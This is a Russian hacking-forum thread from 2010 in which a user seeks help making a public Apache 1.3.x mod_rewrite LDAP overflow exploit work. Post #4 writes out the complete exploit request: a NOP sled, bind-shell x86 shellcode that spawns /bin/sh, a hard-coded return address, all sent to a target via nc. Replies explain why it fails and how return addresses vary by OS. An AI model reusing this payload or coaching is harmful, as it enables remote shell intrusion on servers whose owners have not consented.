HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Apche <1.3.37 exploit
  #1  
Старый 02.04.2010, 15:35
invis87
Новичок
Регистрация: 09.04.2008
Сообщений: 5
С нами: 9519727

Репутация: 1
По умолчанию Apche <1.3.37 exploit

Помогите разобраться с эксплойтом - http://milw0rm.com/exploits/2237
Пытаюсь его запустить но сервер в ответ пишет
HTTP/1.1 400 Bad Request

Я так понимаю в этой строке:
Код:
echo -ne "GET /kung/ldap://localhost/`perl -e 'print "%90"x128'`%89%e6\
закралась лишняя кавычка, но вот какая именно не уловлю.
 
Ответить с цитированием

  #2  
Старый 02.04.2010, 15:57
wkar
Познающий
Регистрация: 18.10.2009
Сообщений: 80
С нами: 8718197

Репутация: 11
По умолчанию

попробуй убрать кавычку возле гет
 
Ответить с цитированием

  #3  
Старый 02.04.2010, 16:07
invis87
Новичок
Регистрация: 09.04.2008
Сообщений: 5
С нами: 9519727

Репутация: 1
По умолчанию

Не помогло.
Код:
echo -ne my_string_for_print
работает так же как и
Код:
echo -ne "my_string_for_print"
 
Ответить с цитированием

  #4  
Старый 02.04.2010, 17:16
invis87
Новичок
Регистрация: 09.04.2008
Сообщений: 5
С нами: 9519727

Репутация: 1
По умолчанию

Код:
echo -ne "GET /kung/ldap://localhost/%90%90%90%90%90%90%90%90%90%90%90\
%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90\
%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90\
%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90\
%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90\
%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%89%e6\
%31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3\
%01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04\
%31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66\
%b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31\
%c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8\
%23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76\
%08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db\
%cd%80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\
%77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\r\n\
Host: $host\r\n\r\n" | nc $host 80
Такая штука тоже не работает. Даже с удалёнными CCCCCCCCCC....
пробовал так:

Код:
nc <host> <port>
<тут мессага хосту>
Если в месседже после GET <uri> есть пробел, то сразу выбрасывается <TITLE>400 Bad Request</TITLE>
Как же тогда выполнить экспойт с его
Код:
HTTP/1.1\r\n\ Host: $host\r\n\r\n
Что вообще ЭТО делает
 
Ответить с цитированием

  #5  
Старый 04.04.2010, 19:23
overxor
Новичок
Регистрация: 11.09.2009
Сообщений: 23
С нами: 8771234

Репутация: 23
По умолчанию

Цитата:
HTTP/1.1\r\n\ Host: $host\r\n\r\n
Что вообще ЭТО делает
Это сетевая этика. Чтобы клиент и сервер понимали друг друга и не было путаницы, было введено использовать возврат каретки и переход на новую строку.

ldap обработчик в апаче по дефолту, вроде, отключен, поэтому не вызывается уязвимая функция.

Если бы даже он был включен, вероятность выполнения это эксплойта была бы ничтожна мала, т.к. адрес возврата задан для определенной ОС(в данном случае debian). Так что, тебе придется сначала найти эту уязвимость, проэксплуатировать, написать версии для разных ОС и только потом уже использовать =) enjoy
 
Ответить с цитированием

  #6  
Старый 05.04.2010, 17:18
invis87
Новичок
Регистрация: 09.04.2008
Сообщений: 5
С нами: 9519727

Репутация: 1
По умолчанию

спасибо
 
Ответить с цитированием

  #7  
Старый 07.06.2010, 15:59
Migel
Новичок
Регистрация: 06.06.2010
Сообщений: 23
С нами: 8384995

Репутация: 5
По умолчанию

Цитата:
Если бы даже он был включен, вероятность выполнения это эксплойта была бы ничтожна мала, т.к. адрес возврата задан для определенной ОС(в данном случае debian).
Я не понимаю при чем здесь ОС? Разьве Apache для разных линухов отличаются?
 
Ответить с цитированием

  #8  
Старый 07.06.2010, 17:23
overxor
Новичок
Регистрация: 11.09.2009
Сообщений: 23
С нами: 8771234

Репутация: 23
По умолчанию

Apache - нет,а адрес возварата везде разный
 
Ответить с цитированием

  #9  
Старый 07.06.2010, 17:39
Migel
Новичок
Регистрация: 06.06.2010
Сообщений: 23
С нами: 8384995

Репутация: 5
По умолчанию

Цитата:
адрес возварата везде разный
Я не силен в программировании, но зачем нужен адрес возврата для DoS експлойта? Записать в память кашу можно и не зная его...
 
Ответить с цитированием

  #10  
Старый 07.06.2010, 17:47
Migel
Новичок
Регистрация: 06.06.2010
Сообщений: 23
С нами: 8384995

Репутация: 5
По умолчанию

И еще - разве такие вещи не зависят от ядра? Т.е. ясное дело, что такой сплойт не подойдет к соляре, но разьве он не будет работать скажем на ВСЕХ линухах с одинаковым ядром?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Mozilla Firefox 3.5.3 Local Download Manager Exploit Isis Уязвимости 0 31.10.2009 04:00
exploit phpBB 2.0.19 ( by SpiderZ ) liauliau Уязвимости CMS / форумов 21 13.01.2007 23:01



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.